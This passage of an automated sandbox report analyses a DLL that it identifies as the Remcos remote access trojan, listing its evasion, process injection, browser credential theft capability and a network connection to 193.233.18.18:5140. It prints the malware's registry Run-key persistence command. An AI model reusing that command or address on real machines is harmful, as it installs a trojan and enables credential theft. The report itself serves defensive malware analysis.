              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_02B1CB50
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Delayed program exit found
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0F7A7 Sleep,ExitProcess,12_2_02B0F7A7
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0F7A7 Sleep,ExitProcess,15_2_02A0F7A7
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_02B1A748
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_02A1A748
              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7662Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2324Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VIVA_01.dllJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 9.6 %
              Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 6.2 %
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 8036Thread sleep count: 7662 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 8036Thread sleep time: -22986000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 8036Thread sleep count: 2324 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 8036Thread sleep time: -6972000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_02B1C291
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B09253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_02B09253
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_02B0C34D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B09665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_02B09665
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B19AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_02B19AF5
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_02B0BB30
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0783C FindFirstFileW,FindNextFileW,12_2_02B0783C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_02B0880C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_02B0BD37
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A1C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_02A1C291
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A09253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_02A09253
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_02A0C34D
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A09665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_02A09665
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A19AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_02A19AF5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_02A0BB30
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0783C FindFirstFileW,FindNextFileW,15_2_02A0783C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_02A0880C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_02A0BD37
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B07C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_02B07C97
              Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_12-48249
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02B3BB22
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_02B1CB50
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B432B5 mov eax, dword ptr fs:[00000030h]12_2_02B432B5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A432B5 mov eax, dword ptr fs:[00000030h]15_2_02A432B5
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B12077 GetProcessHeap,HeapFree,12_2_02B12077
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02B3BB22
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B34B47 SetUnhandledExceptionFilter,12_2_02B34B47
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02B349F9
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B34FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_02B34FDC
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A3BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_02A3BB22
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A34B47 SetUnhandledExceptionFilter,15_2_02A34B47
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_02A349F9
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A34FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_02A34FDC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.233.18.18 5140Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\regsvr32.exe base: 2A00000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 2B00000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 2B40000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 8F0000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 520000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 2A40000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 2A90000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_02B120F7
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_02A120F7
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B19627 mouse_event,12_2_02B19627
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1Jump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: AllocateAndInitializeSid()..\..\Code\Win32\ECWindowsSecurity.cppOpenThreadTokenOpenProcessTokenProcessIdToSessionIdProcessIdToSessionId() not found in kernel32.dllProcessIdToSessionIdFailed to find WTSGetActiveConsoleSessionId() in kernel32.dllWTSGetActiveConsoleSessionIdEqualSidAllocateAndInitializeSidGetTokenInformationAdjustTokenPrivilegesLookupPrivilegeValueLogged on user process found: process id = %d, process name = %s account name = %s, domain name = %s::LookupAccountSid() failed, process id = %d, last error = %d::GetTokenInformation() failed, process id = %d, last error = %d::OpenProcessToken() failed, process id = %d, last error = %d::OpenProcess(%d) failed, last error = %dWTSQueryUserTokenSeTcbPrivilegeFailed to load and initialize the WTSApi32 library.::IsTokenRestricted()Failed to allocate buffer for the token information structureGetTokenInformation()::OpenDesktop(%s) failed, last error = %dFailed to open WinSta0, last error = %dWinSta0explorer.exeProgmanDuplicateTokenExFailed to open process id %uFailed to open process token for process id %uECWindowsSecurity::getLoggedOnUserToken_ThisWTSSession()RevertToSelf()ImpersonateLoggedOnUser()Unable to aquire user token for impersonation%s - already impersonatingECImpersonator::start()%s - The start method was never invoked for this ECImpersonator object.ECImpersonator::~ECImpersonator()
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: BaseBarShell_TrayWndMicrosoft Office Excelexcel.exeMicrosoft Office PowerPointpowerpnt.exeCSharingModeApp::prepareChosenAppWindowsToBeShown BringWindowToTop failed.CSharingModeApp::prepareChosenAppWindowsToBeShown attempt to share empty rectangle.Q
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B34C52 cpuid 12_2_02B34C52
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,12_2_02B0F8D1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,12_2_02B52313
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_02B520C3
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,12_2_02B52036
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_02B52610
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_02B5243C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,12_2_02B48404
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,12_2_02B52543
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,12_2_02B488ED
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,12_2_02B51F9B
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,12_2_02B51F50
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_02B51CD8
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,15_2_02A52313
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_02A520C3
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,15_2_02A52036
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_02A52610
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_02A5243C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,15_2_02A48404
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,15_2_02A52543
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,15_2_02A488ED
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,15_2_02A0F8D1
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,15_2_02A51F9B
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,15_2_02A51F50
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_02A51CD8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B04F51 GetLocalTime,CreateEventA,CreateThread,12_2_02B04F51
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1B60D GetComputerNameExW,GetUserNameW,12_2_02B1B60D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B493AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_02B493AD

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
